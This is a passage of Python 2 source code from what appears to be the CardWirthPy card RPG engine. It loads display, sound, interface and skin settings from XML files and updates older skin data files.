self.fontsmoothing_cardname = data.getbool("FontSmoothingCardName", self.fontsmoothing_cardname_init)
# ステータスバーの文字を滑らかにする
self.fontsmoothing_statusbar = data.getbool("FontSmoothingStatusBar", self.fontsmoothing_statusbar_init)
# フォント名(空白時デフォルト)
self.basefont["gothic"] = data.gettext("FontGothic", self.basefont_init["gothic"])
self.basefont["uigothic"] = data.gettext("FontUIGothic", self.basefont_init["uigothic"])
self.basefont["mincho"] = data.gettext("FontMincho", self.basefont_init["mincho"])
self.basefont["pmincho"] = data.gettext("FontPMincho", self.basefont_init["pmincho"])
self.basefont["pgothic"] = data.gettext("FontPGothic", self.basefont_init["pgothic"])
# 役割別フォント
for e in data.getfind("Fonts", raiseerror=False):
key = e.getattr(".", "key", "")
if not key or not key in self.fonttypes_init:
continue
_deftype, _defname, defpixels, defbold, defbold_upscr, defitalic = self.fonttypes_init[key]
fonttype = e.getattr(".", "type", "")
name = e.text if e.text else u""
pixels = e.getint(".", "pixels", defpixels)
bold = e.getattr(".", "bold", "")
if bold == "":
bold = defbold
else:
bold = cw.util.str2bool(bold)
bold_upscr = e.getattr(".", "expandedbold", "")
if bold_upscr == "":
bold_upscr = defbold_upscr
else:
bold_upscr = cw.util.str2bool(bold_upscr)
italic = e.getattr(".", "italic", "")
if italic == "":
italic = defitalic
else:
italic = cw.util.str2bool(italic)
self.fonttypes[key] = (fonttype, name, pixels, bold, bold_upscr, italic)
# フルスクリーン時の背景タイプ(0:無し,1:ファイル指定,2:スキン)
self.fullscreenbackgroundtype = data.getint("FullScreenBackgroundType", self.fullscreenbackgroundtype_init)
# フルスクリーン時の背景ファイル
self.fullscreenbackgroundfile = data.gettext("FullScreenBackgroundFile", self.fullscreenbackgroundfile_init)
def copy(self):
return copy.deepcopy(self)
class Setting(object):
def __init__(self, loadfile=None, init=True):
# フレームレート
self.fps = 60
# 1frame分のmillseconds
self.frametime = 1000 / self.fps
# Settings
self.init_settings(loadfile, init=init)
def init_settings(self, loadfile=None, init=True):
path = cw.util.join_paths("Data/SkinBase/Skin.xml")
basedata = cw.data.xml2etree(path)
self.skin_local = LocalSetting()
# "Settings_Lite.xml"がなかったら新しく作る
self.local = LocalSetting()
self.editor = "cwxeditor-classic"
self.startupscene = OPEN_TITLE
self.lastyado = ""
self.lastscenario = []
self.lastscenariopath = ""
self.window_position = (None, None)
self.expanddrawing = 1
self.expandmode = "FullScreen"
self.is_expanded = False
self.smoothexpand = True
self.debug = False
self.debug_saved = False
self.no_levelup_in_debugmode = True
self.play_bgm = True
self.play_sound = True
self.vol_master = 0.5
self.vol_bgm = 0.5
self.vol_bgm_midi = 0.5
self.vol_sound = 0.5
self.vol_sound_midi = 0.5
self.soundfonts = [(cw.DEFAULT_SOUNDFONT, True, 100)]
self.bassmidi_sample32bit = True
self.messagespeed = 5
self.dealspeed = 5
self.dealspeed_battle = 5
self.wait_usecard = True
self.use_battlespeed = False
self.transition = "Fade"
self.transitionspeed = 5
self.smoothscale_bg = False
self.smoothing_card_up = True
self.smoothing_card_down = True
self.caution_beforesaving = True
self.revert_cardpocket = True
self.quickdeal = True
self.all_quickdeal = True
self.skindirname = "Classic"
self.vocation120 = False
self.sort_yado = "None"
self.sort_standbys = "None"
self.sort_parties = "None"
self.sort_cards = "None"
self.sort_cardswithstar = True
self.card_narrow = ""
self.card_narrowtype = 1
self.edit_star = False
self.yado_narrowtype = 1
self.standbys_narrowtype = 1
self.parties_narrowtype = 1
self.infoview_narrowtype = 1
self.backlogmax = 100
self.messagelog_type = LOG_COMPRESS
self.showfps = False
self.selectscenariofromtype = True
self.show_unfitnessscenario = True
self.show_completedscenario = True
self.show_invisiblescenario = False
self.wheelup_operation = WHEEL_SHOWLOG
self.wheel_movefocus = True
self.show_allselectedcards = True
self.confirm_beforeusingcard = True
self.confirm_dumpcard = True
self.confirm_beforesaving = CONFIRM_BEFORESAVING_YES
self.show_savedmessage = True
self.show_backpackcard = True
self.show_backpackcardatend = True
self.show_statustime = True
self.noticeimpossibleaction = True
self.initmoneyamount = basedata.getint("Property/InitialCash", 4000)
self.initmoneyisinitialcash = True
self.autosave_partyrecord = False
self.overwrite_partyrecord = True
self.folderoftype = []
self.scenario_narrow = ""
self.scenario_narrowtype = 1
self.scenario_sorttype = 0
self.ssinfoformat = u"[%scenario%[(%author%)] - ][%party% at ]%yado%"
self.ssfnameformat = u"ScreenShot/[%yado%/[%party%_]]%year%%month%%day%_%hour%%minute%%second%[_in_%scenario%].png"
#self.cardssfnameformat = u"ScreenShot/[%yado%/[%party%_]]%year%%month%%day%_%hour%%minute%%second%[_in_%scenario%].png"
self.sswithstatusbar = True
self.titleformat = u"%application% %skin%[ - %yado%[ %scenario%]]"
self.playlogformat = u"PlayLog/%yado%/%party%_%year%%month%%day%_%hour%%minute%%second%_%scenario%.txt"
self.ssinfofontcolor = (0, 0, 0, 255)
self.ssinfobackcolor = (255, 255, 255, 255)
self.ssinfobackimage = u""
self.show_fcardsinbattle = False
self.statusbarmask = False
self.show_experiencebar = True
self.show_roundautostartbutton = True
self.show_autobuttoninentrydialog = True
self.unconvert_targetfolder = u"UnconvertedYado"
self.enabled_right_flick = False
self.flick_time_msec = 300
self.flick_distance = 20
self.can_skipwait = True
self.can_skipanimation = True
self.can_skipwait_with_wheel = True
self.can_forwardmessage_with_wheel = True
self.can_repeatlclick = False
self.cursor_type = CURSOR_WHITE
self.autoenter_on_sprite = False
self.blink_statusbutton = True
self.blink_partymoney = True
self.show_btndesc = True
self.protect_staredcard = True
self.protect_premiercard = True
self.show_cardkind = False
self.show_premiumicon = False
self.can_clicksidesofcardcontrol = False
self.radius_notdetectmovement = 5
self.show_paperandtree = False
self.filer_dir = ""
self.filer_file = ""
self.recenthistory_limit = 5 # 展開したシナリオを取っておく数
self.volume_increment = 5 # ホイールによる全体音量調節での増減量
self.write_playlog = False
self.move_repeat = 240 #移動ボタン押しっぱなしの速度
self.open_lastscenario = True
# アップデートに伴うファイルの自動移動・削除を行う
self.auto_update_files = True
# PyLite固有オプション
self.enable_equalbug = True
self.enable_oldf9 = False
self.display_logbutton = True#隠しオプション
self.display_scalebutton = True
self.display_noticeinfo = True
# 宿の表示順序
self.yado_order = {}
# 絞り込み・整列などのコントロールの表示有無
self.show_additional_yado = False
self.show_additional_player = False
self.show_additional_party = False
self.show_additional_scenario = False
self.show_additional_card = False
# 表示有無切替ボタン自体の表示有無
self.show_addctrlbtn = True
# カード種の表示・非表示
self.show_cardtype = [True] * 3
# カード選択ダイアログで選択中のカード種別
self.last_cardpocket = 0
# カード選択ダイアログでの転送先
self.last_sendto = 0
# カード選択ダイアログでのページ
self.last_storehousepage = 0
self.last_backpackpage = 0
self.last_cardpocketbpage = [0] * 3 # 荷物袋からの使用
# 一覧表示
self.show_multiplebases = False
self.show_multipleparties = False
self.show_multipleplayers = False
self.show_scenariotree = False
# シナリオのインストール先(キー=ルートディレクトリ毎)
self.installed_dir = {}
for t in inspect.getmembers(self, lambda t: not inspect.isroutine(t)):
if not t[0].startswith("__"):
if isinstance(t[1], list):
v = t[1][:]
elif hasattr(t[1], "copy"):
v = t[1].copy()
else:
v = t[1]
setattr(self, "%s_init" % (t[0]), v)
if not init:
return
if not loadfile:
if not os.path.isfile("Settings_Lite.xml"):
self.write()
self.init_skin()
self.set_dealspeed(self.dealspeed, self.dealspeed_battle, self.use_battlespeed)
self.data = cw.data.xml2etree("Settings_Lite.xml")
return
self.data = cw.data.xml2etree("Settings_Lite.xml")
elif os.path.isfile(loadfile):
self.data = cw.data.xml2etree(loadfile)
else:
return
data = self.data
settings_version = data.getattr(".", "dataVersion", "0")
self.local.load(data)
# シナリオエディタ
self.editor = data.gettext("ScenarioEditor", self.editor)
# 起動時の動作
self.startupscene = data.gettext("StartupScene", self.startupscene)
# 最後に選択した宿
self.lastyado = data.gettext("LastYado", self.lastyado)
# 最後に選択したシナリオ(ショートカットがあるため経路を記憶)
self.lastscenario = []
self.lastscenariopath = "" # 経路が辿れない時に使用するフルパス
# ウィンドウ位置
win_x = data.getint("WindowPosition", "left", -sys.maxint-1)
win_y = data.getint("WindowPosition", "top", -sys.maxint-1)
if -sys.maxint-1 == win_x:
win_x = None
if -sys.maxint-1 == win_y:
win_y = None
self.window_position = (win_x, win_y)
# 拡大モード
self.expandmode = data.gettext("ExpandMode", self.expandmode)
if self.expandmode == "None":
self.is_expanded = False
else:
self.is_expanded = data.getbool("ExpandMode", "expanded", self.is_expanded)
self.smoothexpand = data.getbool("ExpandMode", "smooth", self.smoothexpand)
# 描画倍率
if self.expandmode in ("None", "FullScreen"):
self.expanddrawing = 1.0
else:
try:
self.expanddrawing = float(self.expandmode)
except:
self.expanddrawing = 1.0
self.expanddrawing = data.getfloat("ExpandDrawing", self.expanddrawing)
if self.expanddrawing % 1 == 0:
self.expanddrawing = int(self.expanddrawing)
# デバッグモードかどうか
self.debug = data.getbool("DebugMode", self.debug)
self.debug_saved = self.debug
if not loadfile:
if cw.OPTIONS.debug:
# 強制デバッグモード起動
self.debug = True
cw.OPTIONS.debug = False
# デバッグ時はレベル上昇しない
self.no_levelup_in_debugmode = data.getbool("NoLevelUpInDebugMode", self.no_levelup_in_debugmode)
# 音楽を再生する
self.play_bgm = data.getbool("PlayBgm", self.play_bgm)
# 効果音を再生する
self.play_sound = data.getbool("PlaySound", self.play_sound)
# 音声全体のボリューム(0~1.0)
self.vol_master = data.getint("MasterVolume", int(self.vol_master_init * 100))
# 音楽のボリューム(0~1.0)
self.vol_bgm = data.getint("BgmVolume", int(self.vol_bgm_init * 100))
# midi音楽のボリューム(0~1.0)
self.vol_bgm_midi = data.getint("BgmVolume", "midi", self.vol_bgm)
# 効果音ボリューム
self.vol_sound = data.getint("SoundVolume", int(self.vol_sound_init * 100))
# midi効果音のボリューム(0~1.0)
self.vol_sound_midi = data.getint("SoundVolume", "midi", self.vol_sound)
# 音量の単位変更(0~100 to 0~1)
self.vol_master = Setting.wrap_volumevalue(self.vol_master)
self.vol_bgm = Setting.wrap_volumevalue(self.vol_bgm)
self.vol_bgm_midi = Setting.wrap_volumevalue(self.vol_bgm_midi)
self.vol_sound = Setting.wrap_volumevalue(self.vol_sound)
self.vol_sound_midi = Setting.wrap_volumevalue(self.vol_sound_midi)
# MIDIサウンドフォント
elements = data.find("SoundFonts", False)
if not elements is None:
self.soundfonts = []
for e in elements:
use = e.getbool(".", "enabled", True)
volume = e.getint(".", "volume", 100)
self.soundfonts.append((e.text, use, volume))
# 32bitオプションでMIDIを再生する
self.bassmidi_sample32bit = data.getbool("Bassmidi32bit", self.bassmidi_sample32bit)
# メッセージスピード(数字が小さいほど速い)(0~100)
self.messagespeed = data.getint("MessageSpeed", self.messagespeed)
self.messagespeed = cw.util.numwrap(self.messagespeed, 0, 100)
# カードの表示スピード(数字が小さいほど速い)(1~100)
dealspeed = data.getint("CardDealingSpeed", self.dealspeed)
# 戦闘行動の表示スピード(数字が小さいほど速い)(1~100)
dealspeed_battle = data.getint("CardDealingSpeedInBattle", self.dealspeed_battle)
use_battlespeed = data.getbool("CardDealingSpeedInBattle", "enabled", self.use_battlespeed)
self.set_dealspeed(dealspeed, dealspeed_battle, use_battlespeed)
# カードの使用前に空白時間を入れる
self.wait_usecard = data.getbool("WaitUseCard", self.wait_usecard)
# トランジション効果の種類
self.transition = data.gettext("Transition", self.transition)
self.transitionspeed = data.getint("Transition", "speed", self.transitionspeed)
self.transitionspeed = cw.util.numwrap(self.transitionspeed, 0, 10)
# 背景のスムーススケーリング
self.smoothscale_bg = data.getbool("SmoothScaling", "bg", self.smoothscale_bg)
self.smoothing_card_up = data.getbool("SmoothScaling", "upcard", self.smoothing_card_up)
self.smoothing_card_down = data.getbool("SmoothScaling", "downcard", self.smoothing_card_down)
# 保存せずに終了しようとしたら警告
self.caution_beforesaving = data.getbool("CautionBeforeSaving", self.caution_beforesaving)
# レベル調節で手放したカードを自動的に戻す
self.revert_cardpocket = data.getbool("RevertCardPocket", self.revert_cardpocket)
# キャンプ等に高速で切り替える
self.quickdeal = data.getbool("QuickDeal", self.quickdeal)
# 全てのシステムカードを高速表示する
self.all_quickdeal = data.getbool("AllQuickDeal", self.all_quickdeal)
# ソート基準
self.sort_yado = data.getattr("SortKey", "yado", self.sort_yado)
self.sort_standbys = data.getattr("SortKey", "standbys", self.sort_standbys)
self.sort_parties = data.getattr("SortKey", "parties", self.sort_parties)
self.sort_cards = data.getattr("SortKey", "cards", self.sort_cards)
self.sort_cardswithstar = data.getbool("SortKey", "cardswithstar", self.sort_cardswithstar)
# 拠点絞込条件
self.yado_narrowtype = data.getint("YadoNarrowType", self.yado_narrowtype)
# 宿帳絞込条件
self.standbys_narrowtype = data.getint("StandbysNarrowType", self.standbys_narrowtype)
# パーティ絞込条件
self.parties_narrowtype = data.getint("PartiesNarrowType", self.parties_narrowtype)
# カード絞込条件
self.card_narrowtype = data.getint("CardNarrowType", self.card_narrowtype)
# 情報カード絞込条件
self.infoview_narrowtype = data.getint("InfoViewNarrowType", self.infoview_narrowtype)
# メッセージログ最大数
self.backlogmax = data.getint("MessageLogMax", self.backlogmax)
# メッセージログ表示形式
self.messagelog_type = data.gettext("MessageLogType", self.messagelog_type)
self.showfps = False
# スキンによってシナリオの選択開始位置を変更する
self.selectscenariofromtype = data.getbool("SelectScenarioFromType", self.selectscenariofromtype)
# 適正レベル以外のシナリオを表示する
self.show_unfitnessscenario = data.getbool("ShowUnfitnessScenario", self.show_unfitnessscenario)
# 隠蔽シナリオを表示する
self.show_completedscenario = data.getbool("ShowCompletedScenario", self.show_completedscenario)
# 終了済シナリオを表示する
self.show_invisiblescenario = data.getbool("ShowInvisibleScenario", self.show_invisiblescenario)
# マウスホイールによるフォーカス移動
self.wheel_movefocus = data.getbool("WheelMoveFocus", self.wheel_movefocus)
# マウスホイールを上回転させた時の挙動
self.wheelup_operation = data.gettext("WheelUpOperation", self.wheelup_operation)
# 戦闘行動を全員分表示する
self.show_allselectedcards = data.getbool("ShowAllSelectedCards", self.show_allselectedcards)
# カード使用時に確認ダイアログを表示
self.confirm_beforeusingcard = data.getbool("ConfirmBeforeUsingCard", self.confirm_beforeusingcard)
# 売却・破棄時に確認ダイアログを表示
self.confirm_dumpcard = data.getbool("ConfirmDumpCard", self.confirm_dumpcard)
# セーブ前に確認ダイアログを表示
self.confirm_beforesaving = data.gettext("ConfirmBeforeSaving", self.confirm_beforesaving)
# セーブ完了時に確認ダイアログを表示
self.show_savedmessage = data.getbool("ShowSavedMessage", self.show_savedmessage)
# 不可能な行動を選択した時に警告を表示
self.noticeimpossibleaction = data.getbool("NoticeImpossibleAction", self.noticeimpossibleaction)
# 荷物袋のカードを一時的に取り出して使えるようにする
self.show_backpackcard = data.getbool("ShowBackpackCard", self.show_backpackcard)
# 荷物袋カードを最後に配置する
self.show_backpackcardatend = data.getbool("ShowBackpackCardAtEnd", self.show_backpackcardatend)
# 各種ステータスの残り時間を表示する
self.show_statustime = data.getbool("ShowStatusTime", self.show_statustime)
# パーティ結成時の持出金額
self.initmoneyamount = data.getint("InitialMoneyAmount", self.initmoneyamount)
self.initmoneyisinitialcash = data.getbool("InitialMoneyAmount", "sameasbase", self.initmoneyisinitialcash)
# 解散時、自動的にパーティ情報を記録する
self.autosave_partyrecord = data.getbool("AutoSavePartyRecord", self.autosave_partyrecord)
# 自動記録時、同名のパーティ記録へ上書きする
self.overwrite_partyrecord = data.getbool("OverwritePartyRecord", self.overwrite_partyrecord)
# シナリオフォルダ(スキンタイプ別)
for e_folder in data.getfind("ScenarioFolderOfSkinType", False):
skintype = e_folder.getattr(".", "skintype", "")
folder = e_folder.gettext(".", "")
self.folderoftype.append((skintype, folder))
# シナリオ絞込・整列条件
self.scenario_narrowtype = data.getint("ScenarioNarrowType", self.scenario_narrowtype)
self.scenario_sorttype = data.getint("ScenarioSortType", self.scenario_sorttype)
# スクリーンショット情報
self.ssinfoformat = data.gettext("ScreenShotInformationFormat", self.ssinfoformat_init)
# スクリーンショット情報の色
r = data.getint("ScreenShotInformationFontColor", "red", self.ssinfofontcolor_init[0])
g = data.getint("ScreenShotInformationFontColor", "green", self.ssinfofontcolor_init[1])
b = data.getint("ScreenShotInformationFontColor", "blue", self.ssinfofontcolor_init[2])
self.ssinfofontcolor = (r, g, b, 255)
r = data.getint("ScreenShotInformationBackgroundColor", "red", self.ssinfobackcolor_init[0])
g = data.getint("ScreenShotInformationBackgroundColor", "green", self.ssinfobackcolor_init[1])
b = data.getint("ScreenShotInformationBackgroundColor", "blue", self.ssinfobackcolor_init[2])
self.ssinfobackcolor = (r, g, b, 255)
# スクリーンショット情報の背景イメージ
self.ssinfobackimage = data.gettext("ScreenShotInformationBackgroundImage", self.ssinfobackimage_init)
# スクリーンショットのファイル名
self.ssfnameformat = data.gettext("ScreenShotFileNameFormat", self.ssfnameformat_init)
# 所持カード撮影情報のファイル名
#self.cardssfnameformat = data.gettext("ScreenShotOfCardsFileNameFormat", self.cardssfnameformat_init)
# スクリーンショットにステータスバーを含める
self.sswithstatusbar = data.getbool("ScreenShotWithStatusBar", self.sswithstatusbar_init)
# イベント中にステータスバーの色を変える
self.statusbarmask = data.getbool("StatusBarMask", self.statusbarmask)
# 次のレベルアップまでの割合を表示する
self.show_experiencebar = data.getbool("ShowExperienceBar", self.show_experiencebar)
# バトルラウンドを自動開始可能にする
self.show_roundautostartbutton = data.getbool("ShowRoundAutoStartButton", self.show_roundautostartbutton)
# 新規登録ダイアログに自動ボタンを表示する
self.show_autobuttoninentrydialog = data.getbool("ShowAutoButtonInEntryDialog", self.show_autobuttoninentrydialog)
# 逆変換先ディレクトリ
self.unconvert_targetfolder = data.gettext("UnconvertTargetFolder", self.unconvert_targetfolder)
# 右フリックで右クリック相当の操作を行う
self.enabled_right_flick = data.getbool("EnabledRightFlick", self.enabled_right_flick_init)
# 空白時間をスキップ可能にする
self.can_skipwait = data.getbool("CanSkipWait", self.can_skipwait)
# アニメーションをスキップ可能にする
self.can_skipanimation = data.getbool("CanSkipAnimation", self.can_skipanimation)
# マウスのホイールで空白時間とアニメーションをスキップする
self.can_skipwait_with_wheel = data.getbool("CanSkipWaitWithWheel", self.can_skipwait_with_wheel)
# マウスのホイールでメッセージ送りを行う
self.can_forwardmessage_with_wheel = data.getbool("CanForwardMessageWithWheel", self.can_forwardmessage_with_wheel)
# マウスの左ボタンを押し続けた時は連打状態にする
self.can_repeatlclick = data.getbool("CanRepeatLClick", self.can_repeatlclick)
# 方向キーやホイールの選択中にマウスカーソルの移動を検知しない半径
self.radius_notdetectmovement = data.getint("RadiusForNotDetectingCursorMovement", self.radius_notdetectmovement)
# カーソルタイプ
self.cursor_type = data.gettext("CursorType", self.cursor_type)
# 連打状態の時、カードなどの選択を自動的に決定する
self.autoenter_on_sprite = data.getbool("AutoEnterOnSprite", self.autoenter_on_sprite)
# 通知のあるステータスボタンを点滅させる
self.blink_statusbutton = data.getbool("BlinkStatusButton", self.blink_statusbutton)
# 所持金が増減した時に所持金欄を点滅させる
self.blink_partymoney = data.getbool("BlinkPartyMoney", self.blink_partymoney)
# ステータスバーのボタンの解説を表示する
self.show_btndesc = data.getbool("ShowButtonDescription", self.show_btndesc)
# スターつきのカードの売却や破棄を禁止する
self.protect_staredcard = data.getbool("ProtectStaredCard", self.protect_staredcard)
# プレミアカードの売却や破棄を禁止する
self.protect_premiercard = data.getbool("ProtectPremierCard", self.protect_premiercard)
# カード置場と荷物袋でカードの種類を表示する
self.show_cardkind = data.getbool("ShowCardKind", self.show_cardkind)
# カードの希少度をアイコンで表示する
self.show_premiumicon = data.getbool("ShowPremiumIcon", self.show_premiumicon)
# カード選択ダイアログの背景クリックで左右移動を行う
self.can_clicksidesofcardcontrol = data.getbool("CanClickSidesOfCardControl", self.can_clicksidesofcardcontrol)
# シナリオ選択ダイアログで貼紙と一覧を同時に表示する
self.show_paperandtree = data.getbool("ShowPaperAndTree", self.show_paperandtree)
# シナリオ選択ダイアログでのファイラー
self.filer_dir = data.gettext("FilerDirectory", self.filer_dir)
self.filer_file = data.gettext("FilerFile", self.filer_file)
# 圧縮されたシナリオの展開データ保存数
self.recenthistory_limit = data.getint("RecentHistoryLimit", self.recenthistory_limit)
# マウスホイールによる全体音量の増減量
self.volume_increment = data.getint("VolumeIncrement", self.volume_increment)
# 一覧表示
self.show_multiplebases = data.getbool("ShowMultipleItems", "base", self.show_multiplebases)
self.show_multipleparties = data.getbool("ShowMultipleItems", "party", self.show_multipleparties)
self.show_multipleplayers = data.getbool("ShowMultipleItems", "player", self.show_multipleplayers)
self.show_scenariotree = data.getbool("ShowMultipleItems", "scenario", self.show_scenariotree)
# タイトルバーの表示内容
self.titleformat = data.gettext("TitleFormat", self.titleformat)
# 宿の表示順
for e_yadoorder in data.getfind("YadoOrder", raiseerror=False):
if e_yadoorder.tag != "Order":
continue
name = e_yadoorder.getattr(".", "name")
order = int(e_yadoorder.text)
ypath = cw.util.join_paths("Yado", name, "Environment.xml")
if os.path.isfile(ypath):
self.yado_order[name] = order
# 絞り込み・整列などのコントロールの表示有無
self.show_additional_yado = data.getbool("ShowAdditionalControls", "yado", self.show_additional_yado)
self.show_additional_player = data.getbool("ShowAdditionalControls", "player", self.show_additional_player)
self.show_additional_party = data.getbool("ShowAdditionalControls", "party", self.show_additional_party)
self.show_additional_scenario = data.getbool("ShowAdditionalControls", "scenario", self.show_additional_scenario)
self.show_additional_card = data.getbool("ShowAdditionalControls", "card", self.show_additional_card)
# 絞り込み等の表示切替ボタンを表示する
self.show_addctrlbtn = data.gettext("ShowAdditionalControls", "" if self.show_addctrlbtn else "Hidden") <> "Hidden"
# シナリオのプレイログを出力する
self.write_playlog = data.getbool("WritePlayLog", self.write_playlog)
# プレイログのフォーマット
self.playlogformat = data.gettext("PlayLogFormat", self.playlogformat)
# アップデートに伴うファイルの自動移動・削除を行う
self.auto_update_files = data.getbool("AutoUpdateFiles", self.auto_update_files_init)
# シナリオのインストール先(キー=ルートディレクトリ)
e = data.find("InstalledPaths")
if not e is None:
for e_paths in e:
rootdir = e_paths.getattr(".", "root", "")
if not rootdir:
continue
dirstack = []
for e_path in e_paths:
if e_path.text:
dirstack.append(e_path.text)
self.installed_dir[rootdir] = dirstack
# スキン
self.skindirname = data.gettext("Skin", self.skindirname)
if not loadfile:
self.init_skin(basedata=basedata)
# 設定バージョンの更新 設定ファイルを独立させているため2.0以前のものはカット
if int(settings_version) < 4:
# バージョン3→4でMIDI音量をその他の音量と独立した設定に変更
self.vol_bgm_midi = self.vol_bgm * self.vol_bgm_midi
# PyLite:F9互換オプション
self.enable_oldf9 = data.getbool("EnableOldF9", self.enable_oldf9)
self.enable_equalbug = data.getbool("EnableEqualBug", self.enable_equalbug)
# 表示するステータスバーボタン
self.display_logbutton = data.getbool("DisplayLogButton", self.display_logbutton)
self.display_scalebutton = data.getbool("DisplayScaleButton", self.display_scalebutton)
self.display_scalebutton = data.getbool("DisplayNoticeInfo", self.display_noticeinfo)
# 最後に選んだシナリオを開始地点にする
self.open_lastscenario = data.getbool("OpenLastScenario", self.open_lastscenario)
def init_skin(self, basedata=None):
self.skindir = cw.util.join_paths(u"Data/Skin", self.skindirname)
if self.auto_update_files:
cw.update.update_files(self.skindir, self.skindirname)
if not os.path.isdir(self.skindir):
self.skindirname = "Classic"
self.skindir = cw.util.join_paths(u"Data/Skin", self.skindirname)
if not os.path.isdir(self.skindir):
# Classicが無いので手当たり次第にスキンを探す
for path in os.listdir(u"Data/Skin"):
dpath = cw.util.join_paths(u"Data/Skin", path)
fpath = cw.util.join_paths(dpath, "Skin.xml")
if os.path.isfile(fpath):
self.skindirname = path
self.skindir = dpath
break
if not os.path.isdir(self.skindir):
raise ValueError("Not found CardWirthPy skins!")
if basedata is None:
path = cw.util.join_paths("Data/SkinBase/Skin.xml")
basedata = cw.data.xml2etree(path)
path = cw.util.join_paths(self.skindir, "Skin.xml")
data = self._update_skin(path)
err = self._check_skin()
self.skindata = data
if err:
dlg = wx.MessageDialog(None, err, u"スキンチェックエラー", wx.OK|wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
raise
self.skinname = data.gettext("Property/Name", "")
self.skintype = data.gettext("Property/Type", "")
self.vocation120 = data.getbool("Property/CW120VocationLevel", False)
self._classicstyletext = data.getbool("Property/ClassicStyleText", False) # 設定バージョンアップデート用
self.initialcash = data.getint("Property/InitialCash", basedata.getint("Property/InitialCash", 4000))
# スキン・種族
self.races = [cw.header.RaceHeader(e) for e in data.getfind("Races")]
# 特性
self.sexes = [cw.features.Sex(e) for e in data.getfind("Sexes")]
self.sexnames = [f.name for f in self.sexes]
self.sexsubnames = [f.subname for f in self.sexes]
self.sexcoupons = [u"_" + f.name for f in self.sexes]
self.periods = [cw.features.Period(e) for e in data.getfind("Periods")]
self.periodnames = [f.name for f in self.periods]
self.periodsubnames = [f.subname for f in self.periods]
self.periodcoupons = [u"_" + f.name for f in self.periods]
self.natures = [cw.features.Nature(e) for e in data.getfind("Natures")]
self.naturenames = [f.name for f in self.natures]
self.naturecoupons = [u"_" + f.name for f in self.natures]
self.makings = [cw.features.Making(e) for e in data.getfind("Makings")]
self.makingnames = [f.name for f in self.makings]
self.makingcoupons = [u"_" + f.name for f in self.makings]
# デバグ宿で簡易生成を行う際の能力型
sampletypedescs = {}
for e in basedata.getfind("SampleTypes"):
sampletype = cw.features.SampleType(e)
sampletypedescs[sampletype.name] = sampletype.description
self.sampletypes = [cw.features.SampleType(e) for e in data.getfind(u"SampleTypes")]
for sampletype in self.sampletypes:
# 古いスキンでサンプルタイプの解説が無い場合があるので
# 同一名称のサンプルタイプがSkinBaseにあるようなら解説をコピーする
if sampletype.description == u"":
sampletype.description = sampletypedescs.get(sampletype.name, u"")
# 音声とメッセージは、選択中のスキンに
# 定義されていなければスキンベースのもので代替する
# 音声
self.sounds = {}
for e in basedata.getfind("Sounds"):
self.sounds[e.getattr(".", "key", "")] = e.gettext(".", "")
for e in data.getfind("Sounds"):
self.sounds[e.getattr(".", "key", "")] = e.gettext(".", "")
# メッセージ
self.msgs = _MsgDict()
for e in basedata.getfind("Messages"):
self.msgs[e.getattr(".", "key", "")] = e.gettext(".", "")
for e in data.getfind("Messages"):
self.msgs[e.getattr(".", "key", "")] = e.gettext(".", "")
# 未指定種族
self.unknown_race = cw.header.UnknownRaceHeader(self)
self.races.append(self.unknown_race)
# スキン判別用クーポン
syscoupons = data.find("SystemCoupons")
self.skinsyscoupons = SystemCoupons(fpath="", data=syscoupons)
# スキンローカル設定
data = data.find("Settings")
if data is None:
self.skin_local = self.local.copy()
else:
self.skin_local.load(data)
def _update_skin(self, path):
"""旧バージョンのデータの誤りを訂正する。
"""
dpath = os.path.dirname(path)
while not cw.util.create_mutex(dpath):
time.sleep(0.001)
try:
data = cw.data.xml2etree(path)
skinversion = float(data.getattr(".", "dataVersion", "0"))
update = False
#1.1現在、スキンVerが8以下の環境は考えにくいためそれ以前はオミットする
if skinversion <= 8:
# dataVersion=8までは`03_YadoInitial.xml`
# (データ無し宿で表示されるエリア)が存在しなかったので生成。
# タイトル画面のカード位置も調節する。
update = True
fpath = cw.util.join_paths(self.skindir, u"Resource/Xml/Title/01_Title.xml")
if os.path.isfile(fpath):
# タイトル画面のカード位置を調節
e = cw.data.xml2etree(fpath)
e_mcards = e.find("MenuCards")
if not e_mcards is None and len(e_mcards) == 2 and\
e_mcards.getattr(".", "spreadtype", "") == "Custom" and\
e_mcards[0].getint("Property/Location", "left", 0) == 231 and\
e_mcards[0].getint("Property/Location", "top", 0) == 156 and\
e_mcards[1].getint("Property/Location", "left", 0) == 316 and\
e_mcards[1].getint("Property/Location", "top", 0) == 156:
# バックアップを作成
iver = skinversion
if iver % 1 == 0:
iver = int(iver)
dst = "%s.v%s" % (fpath, iver)
dst = cw.util.dupcheck_plus(dst, yado=False)
shutil.copy2(fpath, dst)
e.edit("MenuCards/MenuCard[1]/Property/Location", "233", "left")
e.edit("MenuCards/MenuCard[1]/Property/Location", "150", "top")
e.edit("MenuCards/MenuCard[2]/Property/Location", "318", "left")
e.edit("MenuCards/MenuCard[2]/Property/Location", "150", "top")
e.write()
fpath1 = u"Data/SkinBase/Resource/Xml/Yado/03_YadoInitial.xml"
fpath2 = cw.util.join_paths(self.skindir, u"Resource/Xml/Yado/03_YadoInitial.xml")
if not os.path.isfile(fpath2):
shutil.copy2(fpath1, fpath2)
fpath3 = cw.util.join_paths(self.skindir, u"Resource/Xml/Yado/01_Yado.xml")
if os.path.isfile(fpath3):
e = cw.data.xml2etree(fpath2)
e3 = cw.data.xml2etree(fpath3)
e_playerselect = None
e_returntitle = None
for e_mcard in e3.getfind("MenuCards", raiseerror=False):
command = e_mcard.getattr(".", "command", "")
arg = e_mcard.getattr(".", "arg", "")
if command == "ShowDialog" and arg == "PLAYERSELECT":
e_playerselect = e_mcard
elif command == "ShowDialog" and arg == "RETURNTITLE":
e_returntitle = e_mcard
if not e_playerselect is None:
e.edit("MenuCards/MenuCard[1]/Property/Name",
e_playerselect.gettext("Property/Name"))
e.edit("MenuCards/MenuCard[1]/Property/ImagePath",
e_playerselect.gettext("Property/ImagePath"))
e.edit("MenuCards/MenuCard[1]/Property/Description",
e_playerselect.gettext("Property/Description"))
if not e_returntitle is None:
e.edit("MenuCards/MenuCard[2]/Property/Name",
e_returntitle.gettext("Property/Name"))
e.edit("MenuCards/MenuCard[2]/Property/ImagePath",
e_returntitle.gettext("Property/ImagePath"))
e.edit("MenuCards/MenuCard[2]/Property/Description",
e_returntitle.gettext("Property/Description"))
e_bgimgs = e3.find("BgImages")
if not e_bgimgs is None:
e.remove(".", e.find("BgImages"))
e.insert(".", e_bgimgs, 1)
e_event = e3.find("Events")
if not e_event is None:
